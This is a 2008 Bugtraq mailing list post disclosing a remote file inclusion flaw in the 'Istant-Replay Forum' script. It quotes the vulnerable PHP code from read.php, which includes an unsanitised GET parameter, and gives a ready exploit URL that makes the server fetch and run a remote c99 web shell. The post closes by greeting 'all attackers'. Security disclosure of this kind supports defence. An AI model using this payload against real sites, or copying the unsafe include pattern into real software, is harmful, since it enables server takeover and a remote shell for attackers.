Home page logo
/

bugtraq logo Bugtraq mailing list archives

remote file include
From: win32.exe () w cn
Date: 15 Apr 2008 19:13:42 -0000

#########################################################################
        Istant-Replay Forum  Remote File Inclusion Vulnerability
#########################################################################


## AUTHOR: THuGM4N
## Email : Win32.exe () w cn

## Script : Istant-Replay Forum                  

## Site   : http://www.chattaitaliano.com

## Vulnerable CODE :
~~~~~~~~~~/read.php ~~~~~~~~~~~~~~~~~~~~~~
$a = $_GET['data'];
$b = $_GET['post'];

$foo = include "$a.txt";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


## BUT THE EXPLOIT IS LIKE THAT  :

http://[localhost]/[forum]/read.php?data=http://127.0.0.1/c99.txt?
 

##  BIGUP 2 All Attackers Around The World .

#########################################################################
      Istant-Replay Forum  Remote File Inclusion Vulnerability
#########################################################################


  By Date           By Thread  

Current thread:
  • remote file include win32 . exe (Apr 15)
    • <Possible follow-ups>
    • remote file include win32 . exe (Apr 15)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault